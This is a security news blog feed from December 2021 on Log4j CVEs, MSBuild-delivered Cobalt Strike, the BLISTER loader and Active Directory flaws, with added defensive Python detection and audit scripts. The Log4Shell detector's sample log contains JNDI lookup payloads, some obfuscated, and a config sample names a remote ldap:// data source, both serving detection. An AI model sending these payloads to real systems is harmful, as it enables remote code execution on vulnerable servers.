Dec 29 2021

10 Steps to Cyber Security

Category: cyber security | DISC @ 3:57 pm

Cybersecurity Program Development for Business: The Essential Planning Guide



Dec 29 2021

Apache Log4j 2.17.1 fixes new remote code execution flaw (CVE-2021-44832)

Category: Log Management, Log4j, Security logs | DISC @ 11:39 am

The Apache Software Foundation released Log4j 2.17.1 version to address a recently discovered arbitrary code execution flaw, tracked as CVE-2021-44832, affecting Log4j 2.17.0.

CVE-2021-44832 is the fifth vulnerability discovered in the popular library in recent weeks. Like the previous issues affecting the library, this one could be exploited by threat actors to execute malicious code on affected systems.

“Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.” reads the advisory.

The flaw received a CVSS score of 6.6 and impacts all log4j versions from 2.0-alpha7 to 2.17.0. Versions 2.3.2 and 2.12.4 are not impacted.

The vulnerability was discovered by Checkmarx security researcher Yaniv Nizry who reported it to Apache on December 27.

Nizry also published details of the CVE-2021-44832 flaw in a blog post, in which he speculates that exploiting this issue is more complex than exploiting CVE-2021-44228.

“This vulnerability doesn’t use the disabled lookup feature. The complexity of this vulnerability is higher than the original CVE-2021-44228 since it requires the attacker to have control over the configuration,” states Nizry. “Unlike Logback, in Log4j there is a feature to load a remote configuration file or to configure the logger through the code, so an arbitrary code execution could be achieved with [an] MitM attack, user input ending up in a vulnerable configuration variable, or modifying the config file.”
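The advisory above turns on one detail of the configuration: a JDBC appender whose DataSource names a JNDI resource outside the `java:` scheme. The following audit script, added here as an example and not code from Apache or from the Checkmarx write-up, walks a Log4j 2 XML configuration and reports exactly those DataSources, so a defender can find configurations that would have been accepted before 2.17.1. The sample configuration, the appender names and the placeholder host are constructed.

```python
"""Audit a Log4j 2 XML configuration for JDBC appenders whose DataSource
references a JNDI name outside the 'java:' scheme, the configuration shape
the CVE-2021-44832 advisory describes and the one Log4j 2.17.1 rejects.
Added example, not Apache code; the configuration below is constructed."""
import xml.etree.ElementTree as ET

# Constructed sample: 'auditDb' uses an in-container java: name, 'remoteDb'
# points the data source at a remote naming service (placeholder host).
SAMPLE_CONFIG = """<Configuration status="warn">
  <Appenders>
    <JDBC name="auditDb" tableName="audit_log">
      <DataSource jndiName="java:comp/env/jdbc/AuditDS"/>
      <Column name="message" pattern="%m"/>
    </JDBC>
    <JDBC name="remoteDb" tableName="events">
      <DataSource jndiName="ldap://naming.example.invalid/datasource"/>
      <Column name="message" pattern="%m"/>
    </JDBC>
  </Appenders>
  <Loggers>
    <Root level="info"><AppenderRef ref="auditDb"/></Root>
  </Loggers>
</Configuration>
"""


def _local(tag: str) -> str:
    """Drop any XML namespace prefix so tag comparisons stay simple."""
    return tag.rsplit("}", 1)[-1]


def find_unsafe_datasources(config_xml: str) -> list:
    """Return (appender name, jndiName) for each JDBC DataSource whose JNDI
    name does not start with 'java:'. Any other scheme may resolve through
    a remote naming provider, which is what the fixed versions refuse."""
    root = ET.fromstring(config_xml)
    findings = []
    for appender in root.iter():          # iter() walks the whole tree
        if _local(appender.tag) != "JDBC":
            continue
        for ds in appender.iter():
            if _local(ds.tag) != "DataSource":
                continue
            jndi_name = ds.get("jndiName", "")
            if not jndi_name.lower().startswith("java:"):
                findings.append((appender.get("name", "?"), jndi_name))
    return findings


if __name__ == "__main__":
    for name, jndi_name in find_unsafe_datasources(SAMPLE_CONFIG):
        print(f"appender {name!r}: DataSource jndiName {jndi_name!r} "
              "is outside the java: scheme")
```

Log4j 2 also accepts JSON, YAML and properties configurations, so the same check has to be applied to those formats as well. Since the attack described in the advisory needs write access to the configuration (or a remotely loaded one), the durable control is restricting who can change logging configuration and not loading it from remote locations; this scan only tells you whether a configuration already carries the vulnerable shape.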

Tags: CVE-2021-44832


Dec 28 2021

Top 3 ITG ISO 27001 books 

Category: Information Security, ISO 27k | DISC @ 1:44 pm
Now that the festive frenzies have almost finished and you still have a few quiet days to spend at home, this is a great time to invest in your education. Enhance your knowledge of ISO 27001 with our wide range of books. Available in a variety of formats, including audiobook, softcover, Kindle and ePub, they cover everything you need to know about ISO 27001 and how to implement it. You can also focus on gaining an ISO 27001 qualification and top up your CPD/CPE points with our self-paced training courses. Until January 3, you can get 10% off self-paced training courses by using the promo code XMASTRAIN at checkout*. 
ISO 27001 controls – A guide to implementing and auditing
Ideal for information security managers, auditors, consultants and organizations preparing for ISO 27001 certification, this book will help readers understand the requirements of an ISMS (information security management system) based on ISO 27001. Similarly, for anyone involved in internal or external audits, the book includes the definitive requirements that auditors must address when certifying organizations to ISO 27001.

Nine Steps to Success – An ISO 27001 Implementation Overview, North American edition
Get to grips with the requirements of the ISO 27001 Standard and discover how to make your ISO 27001 implementation project a success with this must-have guide from international ISO 27001 expert Alan Calder.
The ideal resource for anyone tackling ISO 27001 implementation for the first time, it details the key steps of an ISO 27001 project from inception to certification and explains each element of the ISO 27001 project in simple, non-technical language.

Information Security Risk Management for ISO 27001/ISO 27002, third edition
Ideal for risk managers, information security managers, lead implementers, compliance managers and consultants, as well as providing useful background material for auditors, this book will enable readers to develop an ISO 27001-compliant risk assessment framework and deliver real, bottom-line business benefits.

Tags: ISO 27001 books


Dec 28 2021

Cyber security small business guide

Category: cyber security | DISC @ 10:18 am

Cybersecurity Program Development for Business: The Essential Planning Guide


Tags: cyber security guide, Cybersecurity Program Development for Business


Dec 28 2021

External attackers can penetrate most local company networks

Category: Cyber Threats, Insider Threat, Threat detection | DISC @ 9:54 am

These are the results of a new research report by Positive Technologies, analyzing results of the company’s penetration testing projects carried out in the second half of 2020 and first half of 2021.

The study was conducted among financial organizations (29%), fuel and energy organizations (18%), government (16%), industrial (16%), IT companies (13%), and other sectors.

During the assessment of protection against external attacks, Positive Technologies experts managed to breach the network perimeter in 93% of cases. According to the company’s researchers, this figure has remained high for many years, confirming that criminals are able to breach almost any corporate infrastructure.

“In 20% of our pentesting projects, clients asked us to check what unacceptable events might be feasible as a result of a cyberattack. These organizations identified an average of six unacceptable events each, and our pentesters set out to trigger those. According to our customers, events related to the disruption of technological processes and the provision of services, as well as the theft of funds and important information pose the greatest danger,” said Ekaterina Kilyusheva, Head of Research and Analytics, Positive Technologies.

“In total, Positive Technologies pentesters confirmed the feasibility of 71% of these unacceptable events. Our researchers also found that a criminal would need no more than a month to conduct an attack which would lead to the triggering of an unacceptable event. And attacks on some systems can be developed in a matter of days,” Kilyusheva added.

Despite the fact that financial organizations are considered to be among the most protected companies, as part of the verification of unacceptable events in each of the banks we tested, our specialists managed to perform actions that could let criminals disrupt the bank’s business processes and affect the quality of the services provided. For example, they obtained access to an ATM management system, which could allow attackers to steal funds.

An attacker’s path from external networks to target systems begins with breaching the network perimeter. According to our research, on average, it takes two days to penetrate a company’s internal network. Credential compromise is the main way criminals can penetrate a corporate network (71% of companies), primarily because of simple passwords used, including for accounts used for system administration.

Microservices Security in Action: Design secure network and API endpoint security for Microservices applications

Tags: External attackers


Dec 28 2021

Threat actors are abusing MSBuild to implant Cobalt Strike Beacons

Category: Cyber Threats, Threat detection, Threat Modeling | DISC @ 9:30 am

A security expert from Morphus Labs recently observed several malicious campaigns abusing the Microsoft Build Engine (MSBuild) to execute a Cobalt Strike payload on compromised machines.

MSBuild is a free and open-source build toolset for managed code as well as native C++ code and was part of the .NET Framework. It is used for building apps and gives users an XML schema that controls how the build platform processes and builds software; attackers abuse that same mechanism to deliver malware using callbacks.

Morphus Labs security researcher and SANS Internet Storm Center (ISC) handler Renato Marinho said he uncovered two different malicious campaigns that were abusing MSBuild for code execution.

The malicious MSBuild project employed in the attacks was designed to compile and execute specific C# code that in turn decodes and executes Cobalt Strike payload.

“Now, let’s look at the malicious MSBuild project file in Figure 3. Using the same principle, when called by MSBuild, it will compile and execute the custom C#, decode and execute the Cobalt Strike beacon on the victim’s machine.” wrote Marinho.

[Figure 3: malicious MSBuild project file]

In the attack scenario described by the researcher, the attackers initially gained access to the target environment using a valid remote desktop protocol (RDP) account, then leveraged remote Windows Services (SCM) for lateral movement, and MSBuild to execute the Cobalt Strike Beacon payload.

The Beacon was used to decrypt the communication with the C2 server, which was SSL encrypted.
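The project file the campaign relies on is an ordinary MSBuild feature, an inline task whose C# source sits inside a `<Code>` element and is compiled and run when a target calls the task. The scanner below, added here as an example and not code from Morphus Labs or the SANS ISC post, parses a project file and lists every inline task together with the targets that invoke it, which is the first triage question when an MSBuild.exe execution turns up somewhere a build should not be happening. Both project files are constructed, and the inline task body is deliberately left empty.

```python
"""List inline tasks (<UsingTask> carrying a <Code> element) in MSBuild
project files, and the targets that call them. Added example, not code from
Morphus Labs or SANS ISC; the project files below are constructed."""
import xml.etree.ElementTree as ET


def _local(tag: str) -> str:
    """Strip the XML namespace so the scan works for both the classic
    msbuild/2003 namespace and namespace-less SDK-style projects."""
    return tag.rsplit("}", 1)[-1]


def inline_tasks(project_xml: str) -> list:
    """Return one record per inline task: its name, language, task factory
    and the names of the <Target> elements that invoke it."""
    root = ET.fromstring(project_xml)
    findings = []
    for elem in root.iter():
        if _local(elem.tag) != "UsingTask":
            continue
        code = [c for c in elem.iter() if _local(c.tag) == "Code"]
        if not code:
            continue  # ordinary UsingTask pointing at a compiled assembly
        name = elem.get("TaskName", "?")
        targets = sorted(
            t.get("Name", "?")
            for t in root.iter()
            if _local(t.tag) == "Target"
            and any(_local(child.tag) == name for child in t)
        )
        findings.append({
            "task": name,
            "language": code[0].get("Language", "cs"),
            "factory": elem.get("TaskFactory", ""),
            "targets": targets,
        })
    return findings


# Constructed project in the shape the post describes: a single target whose
# only job is to run an inline C# task. The task body is intentionally empty.
INLINE_PROJECT = r"""<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Run">
    <RunStage />
  </Target>
  <UsingTask TaskName="RunStage" TaskFactory="CodeTaskFactory"
             AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.Core.dll">
    <Task>
      <Code Type="Class" Language="cs"><![CDATA[
        // constructed placeholder: the inline C# body is intentionally omitted
      ]]></Code>
    </Task>
  </UsingTask>
</Project>
"""

# Constructed ordinary SDK-style project with no inline tasks at all.
ORDINARY_PROJECT = r"""<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup><OutputType>Exe</OutputType><TargetFramework>net6.0</TargetFramework></PropertyGroup>
  <ItemGroup><Compile Include="Program.cs" /></ItemGroup>
</Project>
"""

if __name__ == "__main__":
    for rec in inline_tasks(INLINE_PROJECT):
        print(f"inline {rec['language']} task {rec['task']!r} "
              f"({rec['factory']}) invoked by targets {rec['targets']}")
```

Inline tasks are legitimate in real build trees, so a hit is a triage lead rather than a verdict: the file's location, who launched MSBuild.exe, and whether the parent process is a developer tool or a service decide whether it is worth escalating.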

Cobalt Strike, a Defender’s Guide

Cobalt Strike, a Defender’s Guide (The DFIR Report's 2021 Intrusions) by [The DFIR Report]

Tags: Cobalt Strike, Cobalt Strike Beacons, MSBuild


Dec 27 2021

The ultimate guide to PCI DSS compliance

Category: Information Security, pci dss | DISC @ 11:56 am


Luke Irwin  

If your business handles debit or credit card data, you’ve probably heard of the PCI DSS (Payment Card Industry Data Security Standard).

It’s an information security framework designed to reduce payment card fraud by requiring organisations to implement technical and organisational defence measures.

We explain everything you need to know about the PCI DSS in this blog, including who it applies to, the benefits of compliance and what happens if you fail to meet its requirements.

Who needs PCI DSS compliance?

Any merchant or service provider that processes, transmits or stores cardholder data is subject to the PCI DSS.

  • Merchants are organisations that accept debit or credit card payments for goods or services.
  • Service providers are businesses that are directly involved in processing, storing or transmitting cardholder data on behalf of another entity.

Some organisations can be both a merchant and a service provider. For instance, an organisation that provides data processing services for other merchants will also be a merchant itself if it accepts card payments from them.

Benefits of PCI DSS compliance

The most obvious benefit of PCI DSS compliance is to reduce the risk of security incidents. When organisations implement its requirements, they shore up the most common weaknesses that attackers exploit.

According to the 2020 Trustwave Global Security Report, the majority of data breaches involving cardholder data were CNP (card-not-present) attacks. This indicates that e-commerce platforms are the most vulnerable, but this is only half the picture.

Data protection isn’t just about preventing cyber attacks; information can also be exposed by mistakes the organization makes. Such errors can also result in violations of the GDPR (General Data Protection Regulation) and other data protection laws.

PCI DSS compliance can help organisations prevent such regulatory errors and the consequences associated with them.

Is PCI DSS compliance mandatory?

The PCI DSS is a standard, not a law, and is enforced through contracts between merchants, the acquiring banks that process payment card transactions and the payment brands.

Compliance is mandatory for all organisations that process, store or transmit cardholder data. Covered organisations that fail to meet their requirements could face strict penalties.

Notably, the Standard doesn’t simply levy a one-off fine for non-compliance. Instead, organisations can be penalised between $5,000 (about €4,300) and $100,000 (about €86,000) a month until they achieve compliance.

Organisations can also face other punitive measures from their acquiring bank. For example, the bank might increase its transaction fees or terminate the relationship with the merchant altogether.

How do I achieve PCI DSS compliance?

The PCI DSS contains 12 requirements that organisations must meet if they are to achieve compliance.

They are a combination of technical solutions, such as data encryption and network monitoring, alongside processes and policies to ensure that employees manage sensitive data effectively.

Those processes include steps such as changing default passwords, restricting physical access to locations where cardholder data is stored and creating an information security policy.

How do you know if you are PCI compliant?

To demonstrate PCI DSS compliance, organisations must audit their CDE (cardholder data environment).

There are three types of audit:

  • RoC (Report on Compliance), conducted by a QSA (Qualified Security Assessor) or an ISA (Internal Security Assessor).
  • SAQ (Self-Assessment Questionnaire), signed by a company officer.
  • Quarterly external vulnerability scan by an ASV (Approved Scanning Vendor).

The type of audit you must conduct, and your exact PCI DSS compliance requirements, will vary depending on your merchant or service provider level. This information is based on the number of card transactions processed per year.

Level 1 merchants are those that process more than 6 million transactions per year, or those whose data has previously been compromised. They must complete the following each year:

  • RoC conducted by a QSA or ISA.
  • Quarterly scan by an ASV.

Level 2 merchants are those that process 1 million to 6 million transactions per year. They must complete the following each year:

  • RoC conducted by a QSA or ISA, or an SAQ (SAQ D) signed by a company officer (dependent on payment brand).
  • Quarterly scan by an ASV.

Level 3 merchants are those that process 20,000 to 1 million transactions per year. They must complete the following each year:

  • SAQ signed by a company officer.
  • Quarterly scan by an ASV (dependent on SAQ completed).

Level 4 merchants are those that process fewer than 20,000 transactions per year. They must complete the following each year:

  • SAQ signed by a company officer.
  • Quarterly scan by an ASV (dependent on SAQ completed).

The audit requirements for service providers are more straightforward. Level 1 encompasses any organisation that processes and/or stores more than 300,000 transactions per year. They are required to have a RoC conducted by a QSA or ISA and have an ASV conduct quarterly scans.

Service providers that transmit and/or store fewer than 300,000 transactions per year must complete either an RoC conducted by a QSA or an ISA, or an SAQ D signed by a company officer. They must also have an ASV conduct quarterly scans.

Get started with the PCI DSS

As a QSA company, IT Governance provides services to support organisations at each stage of their PCI DSS compliance project. You can find the complete list of PCI DSS services and solutions on our website.

Organizations looking for help achieving compliance should take a look at our PCI DSS Documentation Toolkit.

It contains everything you need to implement the Standard’s requirements, including template documents and a document checker to ensure you select and amend the appropriate records.

The toolkit supports all self-assessment questionnaires, regardless of your specific payment scenario.

It’s fully aligned with the PCI DSS, so you can be sure that your policies are accurate and compliant. All you have to do is fill in the sections that are relevant to your organization.

PCI DSS Implementation Training Course | Qualified Security Assessor Company

PCI DSS: A pocket guide, sixth edition

PCI DSS: A pocket guide, sixth edition | IT Governance USA

Tags: PCI, pci dss


Dec 27 2021

Windows Event Log Analysis

Category: Log Management, Security logs, Windows Security | DISC @ 11:14 am

Trace and Log Analysis: A Pattern Reference for Diagnostics and Anomaly Detection

Trace and Log Analysis: A Pattern Reference for Diagnostics and Anomaly Detection by [Dmitry Vostokov, Software Diagnostics Institute]

Tags: Trace and Log Analysis, Windows Event Log


Dec 27 2021

Experts monitor ongoing attacks using exploits for Log4j library flaws

Category: Log Management, Log4j | DISC @ 11:01 am

Researchers from DrWeb monitored attacks leveraging exploits for vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-4104, and CVE-2021-42550) in the Apache Log4j library and warned of the need to adopt protective measures.

The vulnerabilities can allow threat actors to execute arbitrary code on the target systems, trigger a Denial of Service condition, or disclose confidential information.

Dr. Web set up one of its honeypots to analyze the impact of the Log4j vulnerabilities on systems exposed online and observed intense activity between December 17th and 20th.


“We record attacks using exploits for the vulnerabilities on one of our honeypots–a special server used by Doctor Web specialists as bait for fraudsters. The most active threat occurred between December 17th-20th, but attacks still continue.” reads the analysis published by DrWeb.

Day           Number of attacks
December 10   7
December 11   20
December 12   25
December 13   15
December 14   32
December 15   21
December 16   24
December 17   47
December 18   51
December 19   33
December 20   32
December 21   14
December 22   35
December 23   36

The attacks were carried out from 72 different IP addresses, most of them German (21%), followed by Russia (19.4%), the USA and China (9.7%).
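The per-day counts and the source-address breakdown above are what a honeypot operator gets by running a detection rule over its request logs and tallying the hits. The script below, added here as an example and not DrWeb's honeypot code, does that for Apache-style access-log lines: it normalises the simple lookup wrappers (`${lower:}`, `${upper:}`, `${::-x}`) that are routinely placed around the `jndi` keyword so a naive substring match misses it, then counts matching requests per day and per source address. The log lines are constructed and use documentation address ranges.

```python
"""Detect Log4Shell-style JNDI lookup strings in web access logs and tally
them per day and per source address. Added example, not DrWeb's honeypot
tooling; the log lines are constructed with documentation (TEST-NET) IPs."""
import re
from collections import Counter

SAMPLE_LOG = """\
203.0.113.7 - - [17/Dec/2021:10:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9:1389/x}"
198.51.100.23 - - [17/Dec/2021:11:45:09 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.7 - - [18/Dec/2021:03:14:15 +0000] "GET /?q=${${lower:j}ndi:ldap://198.51.100.9/x} HTTP/1.1" 400 0 "-" "curl/7.68"
192.0.2.44 - - [18/Dec/2021:03:20:00 +0000] "POST /login HTTP/1.1" 302 0 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://198.51.100.9/a}"
192.0.2.44 - - [20/Dec/2021:09:00:00 +0000] "GET /robots.txt HTTP/1.1" 200 60 "-" "Mozilla/5.0"
"""

# Lookup forms that evaluate to their literal argument; collapsing them first
# means the detector sees the same text Log4j would after substitution.
_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^}]*)\}|\$\{::-([^}]*)\}", re.IGNORECASE)
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Source address and day from an Apache combined-format line.
_LINE = re.compile(r"^(?P<ip>\S+) \S+ \S+ \[(?P<day>\d{2}/\w{3}/\d{4}):")


def normalise(text: str) -> str:
    """Repeatedly replace simple lookups by their literal value until the
    text stops changing, which also unwinds nested wrappers."""
    previous = None
    while previous != text:
        previous = text
        text = _LOOKUP.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text)
    return text


def is_log4shell_probe(line: str) -> bool:
    return _JNDI.search(normalise(line)) is not None


def summarise(log_text: str):
    """Return (hits per day, hits per source IP) for the matching lines."""
    per_day, sources = Counter(), Counter()
    for line in log_text.splitlines():
        if not is_log4shell_probe(line):
            continue
        m = _LINE.match(line)
        if not m:
            continue  # line is not in the expected access-log format
        per_day[m.group("day")] += 1
        sources[m.group("ip")] += 1
    return per_day, sources


if __name__ == "__main__":
    days, ips = summarise(SAMPLE_LOG)
    for day, n in sorted(days.items()):
        print(f"{day}: {n} attack(s)")
    print(f"{len(ips)} distinct source address(es)")
```

The normalisation step is the part worth keeping: Log4j resolves nested lookups before it ever sees the `jndi:` prefix, so a detector that only looks for the literal string undercounts by exactly the share of requests that used wrappers. A country breakdown like DrWeb's needs a GeoIP lookup on the `sources` counter, which is left out here so the example runs offline.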

Log4J by [J. Steven Perry]

Tags: Log4j library flaws


Dec 26 2021

Penetration Testing Tools for Blue Team

Category: Pen Test | DISC @ 10:26 am

Ethical hacking and lock picking

Pen Testing Titles

Tags: Pen testing, Penetration test


Dec 24 2021

Anti-Ransomware Checklist

Category: Ransomware | DISC @ 12:41 pm

Ransomware Protection Playbook

https://www.facebook.com/DISCInfoSec/shop/

https://www.amazon.com/shop/discinfosec

Tags: ransomware, ransomware checklist, Ransomware Protection Playbook


Dec 24 2021

Experts warn of a new stealthy loader tracked as BLISTER

Category: Malware, Windows Security | DISC @ 12:17 pm

Security researchers spotted a campaign that is employing a new stealthy malware loader tracked as BLISTER that targets Windows systems.

Elastic Security researchers uncovered a malware campaign that leverages new malware and a stealthy loader tracked as BLISTER, which uses a valid code signing certificate issued by Sectigo to evade detection.

BLISTER loads second-stage payloads that are executed directly in the memory of the Windows system and maintains persistence. The malicious code has a low detection rate and implements multiple tricks to avoid detection.

“A valid code signing certificate is used to sign malware to help the attackers remain under the radar of the security community. We also discovered a novel malware loader used in the campaign, which we’ve named BLISTER. The majority of the malware samples observed have very low, or no, detections in VirusTotal,” reads the analysis published by Elastic. “The infection vector and goals of the attackers remain unknown at this time.”

[Figure: Blister campaign]

The certificate used to sign the loader code was issued by Sectigo for a company called Blist LLC, which has an email address from a Russian provider Mail.Ru.

The loader is embedded into legitimate libraries, such as colorui.dll, to avoid raising suspicion. It can be initially written to disk by simple dropper executables.

Upon execution, BLISTER decodes bootstrapping code stored in the resource section with a simple 4-byte XOR routine. The malware authors heavily obfuscated the bootstrapping code, which initially sleeps for 10 minutes before executing in an attempt to evade sandbox analysis.

Then the loader decrypts the embedded malware payload; experts reported the use of Cobalt Strike and BitRAT as embedded payloads. The payload is loaded into the current process or injected into a newly spawned WerFault.exe process.

In order to achieve persistence, BLISTER copies itself to the C:\ProgramData folder and renames a local copy of rundll32.exe. Then it creates a link in the current user’s Startup folder to launch the malware at logon as a child of explorer.exe.

Elastic’s researchers shared Yara rules for this campaign along with indicators of compromise.
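The persistence mechanism described above leaves three artefacts a host triage can check without any signature: a shortcut in the user's Startup folder, a target executable under ProgramData, and a binary whose PE version resource still says it is rundll32.exe even though the file has another name. The script below, added here as an example and not Elastic's YARA rules or indicators, scores Startup-folder entries against that pattern. The entries are constructed in the shape a collection script might produce, and the `original_filename` field assumes the PE VERSIONINFO value has already been read from each target.

```python
"""Triage Startup-folder shortcuts for the persistence pattern described
above: a shortcut whose target is a renamed copy of rundll32.exe living under
ProgramData. Added example, not Elastic's rules or IoCs; the entries are
constructed and the PE OriginalFilename value is assumed pre-collected."""
from pathlib import PureWindowsPath

SAMPLE_ENTRIES = [  # constructed
    {"lnk": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk",
     "target": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
     "original_filename": "OneDrive.exe",
     "args": "/background"},
    {"lnk": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Updater.lnk",
     "target": r"C:\ProgramData\svchelper.exe",
     "original_filename": "RUNDLL32.EXE",
     "args": r"C:\ProgramData\colorui.dll,#1"},
    {"lnk": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notes.lnk",
     "target": r"C:\Windows\System32\rundll32.exe",
     "original_filename": "RUNDLL32.EXE",
     "args": r"C:\Program Files\NotesApp\notes.dll,Start"},
]


def _under_programdata(path: PureWindowsPath) -> bool:
    """True for paths directly below <drive>:\\ProgramData."""
    parts = [p.lower() for p in path.parts]
    return len(parts) >= 2 and parts[0].endswith(":\\") and parts[1] == "programdata"


def triage_entry(entry: dict) -> list:
    """Return the reasons this shortcut matches the pattern; empty if none."""
    reasons = []
    target = PureWindowsPath(entry["target"])
    original = entry.get("original_filename", "").lower()
    args = entry.get("args", "")
    # The copy keeps its version resource, so the original name still shows.
    if original == "rundll32.exe" and target.name.lower() != "rundll32.exe":
        reasons.append("target is a renamed copy of rundll32.exe")
    if _under_programdata(target):
        reasons.append("target executable lives under ProgramData")
    # rundll32 (renamed or not) being pointed at a DLL dropped in ProgramData.
    dll_arg = args.split(",")[0]
    if original == "rundll32.exe" and dll_arg.lower().endswith(".dll") \
            and _under_programdata(PureWindowsPath(dll_arg)):
        reasons.append("rundll32 loads a DLL from ProgramData")
    return reasons


def triage_startup_entries(entries: list) -> list:
    """Keep only the entries with at least one reason, with their reasons."""
    flagged = []
    for entry in entries:
        reasons = triage_entry(entry)
        if reasons:
            flagged.append({"lnk": entry["lnk"], "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for hit in triage_startup_entries(SAMPLE_ENTRIES):
        print(hit["lnk"])
        for reason in hit["reasons"]:
            print("   -", reason)
```

The third sample entry, a genuine rundll32.exe in System32 loading a DLL from Program Files, produces no reasons, which is the point of checking the original filename against the on-disk name rather than flagging every rundll32 launch.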

Malware Analysis and Detection Engineering: A Comprehensive Approach to Detect and Analyze Modern Malware

InfoSec is the page where the InfoSec community interacts and shares InfoSec and compliance related information.

“You Become What You Think About Ask; and it shall be given to you Seek; and you shall find Knock; and it shall be opened unto you.”

Tags: BLISTER, InfoSec Page, Malware Analysis, stealthy loader


Dec 23 2021

WireShark Cheat sheet

Category: Cheat Sheet, Network security | DISC @ 11:13 am

Tags: wireshark


Dec 23 2021

Combating identity fraud: The key is to avoid stagnation

Category: Identity Theft | DISC @ 9:57 am
As cybercrime sophistication reaches new heights, what can organizations do to tackle these new threats?

Phishing, identity theft, and ransomware are not new types of cyberattacks. What is new is bad actors increasingly using automation and other advanced technologies to more quickly identify and exploit vulnerabilities in organizations’ defenses to access or steal sensitive data without being detected.

One commonality among most attackers is their desire to achieve the most lucrative outcome. They view themselves as a business, and like any business, they want to increase their ROI. Using automated bots is an easy and inexpensive way to identify vulnerable targets and launch their attacks.

Therefore, organizations must build and enforce barriers that the criminal determines are too complex and expensive to overcome. One way to do so is by conducting extensive vetting during the new customer onboarding process that challenges customers to verify their identities. A rigorous approach to onboarding not only ensures the person creating a new user account is who they say they are and builds trust, but it will also compel a bad actor to give up and move on to their next target.

What are the technologies they can use not only to protect themselves but their customers too?

Identity Theft: Satan’s Greatest Crime Against Humanity

Tags: identity fraud, Identity Theft


Dec 23 2021

Crooks bypass a Microsoft Office patch for CVE-2021-40444 to spread Formbook malware

Category: App Security, Malware | DISC @ 9:40 am

Cybercriminals have found a way to bypass the patch for a recent Microsoft Office vulnerability tracked as CVE-2021-40444 (CVSS score of 8.8). The bad news is that threat actors are using it to distribute the Formbook malware.

The CVE-2021-40444 is a remote code execution security flaw that affected the MSHTML file format.

The security defect can be exploited to achieve remote code execution on vulnerable systems. An attacker looking to exploit the bug needs to trick the intended victim into opening a maliciously crafted document.

In September Microsoft warned of multiple threat actors, including ransomware operators, that were exploiting the Windows MSHTML remote code execution security flaw in attacks against organizations.

The IT giant said that threat actors started targeting this issue on August 18, before Microsoft shared mitigations for the vulnerability, using weaponized Office documents. The campaigns observed in August 2021 employed emails impersonating contracts and legal agreements, and the messages used documents that were hosted on file-sharing sites.

Microsoft addressed the flaw with the release of Microsoft Patch Tuesday security updates for September 2021.

The availability of Proof-of-concept exploit code for this vulnerability caused a spike in attacks attempting to exploit this issue.

In the initial attacks observed by the researchers, the malicious code downloads a Microsoft Cabinet (CAB) archive containing a malicious executable. The patch developed by Microsoft prevents the execution of the code to download the CAB archive, but now threat actors are bypassing the patch by incorporating a Word document in a specially crafted RAR archive.

Learning Malware Analysis

Tags: Learning Malware Analysis, Microsoft Office patch


Dec 22 2021

All in One SEO Plugin Bug Threatens 3M Websites with Takeovers

Category: Information Security, Web Security | DISC @ 1:16 pm

A critical privilege-escalation vulnerability could lead to backdoors for admin access nesting in web servers.

A popular WordPress SEO-optimization plugin, called All in One SEO, has a pair of security vulnerabilities that, when combined into an exploit chain, could leave website owners open to site takeover. The plugin is used by more than 3 million websites.

An attacker with an account on the site – such as a subscriber, shopping account holder or member – can take advantage of the holes, which are a privilege-escalation bug and an SQL-injection problem, according to researchers at Sucuri.

[Figure: WordPress plugin zero day]

“WordPress websites by default allow any user on the web to create an account,” researchers said in a posting on Wednesday. “By default, new accounts are ranked as subscriber and do not have any privileges other than writing comments. However, certain vulnerabilities, such as the ones just discovered, allow these subscriber users to have vastly more privileges than they were intended to have.”

The pair is ripe for easy exploitation, according to Sucuri, so users should upgrade to the patched version, v. 4.1.5.3. Marc Montpas, a security researcher at Automattic, was credited with finding the bugs.

Privilege Escalation and SQL Injection

WordPress – Security Tips – How to outsmart hackers: A step-by-step guide

Tags: Plugin Bug, Wordpress Security Tips


Dec 22 2021

Patch these 2 Active Directory flaws to prevent the takeover of Windows domains

Category: Windows Security | DISC @ 12:48 pm

Microsoft released an alert on a couple of Active Directory vulnerabilities, fixed with the November 2021 Patch Tuesday security updates, that could allow threat actors to take over Windows domains.

The flaws, tracked as CVE-2021-42287 and CVE-2021-42278, can be chained to impersonate domain controllers and gain administrative privileges on Active Directory.

Microsoft is now warning customers to address both issues immediately due to the public availability of Proof-of-concept exploit code. The IT giant also published a guide to help customers in detecting the attempts of exploitation of both issues.

“Both vulnerabilities are described as a ‘Windows Active Directory domain service privilege escalation vulnerability’. A few weeks later, on December 12, 2021, a proof-of-concept tool leveraging these vulnerabilities was publicly disclosed.” states Microsoft. “When combining these two vulnerabilities, an attacker can create a straightforward path to a Domain Admin user in an Active Directory environment that hasn’t applied these new updates. This escalation attack allows attackers to easily elevate their privilege to that of a Domain Admin once they compromise a regular user in the domain.”

The CVE-2021-42278 vulnerability is a security bypass issue that allows potential attackers to impersonate a domain controller using computer account sAMAccountName spoofing.

Experts pointed out that sAMAccountName attributes usually end with “$” in their name. “$” was used to distinguish between user objects and computer objects. With default settings, a normal user has permission to modify a machine account (up to 10 machines) and as its owner, they also have the permissions to edit its sAMAccountName attribute.
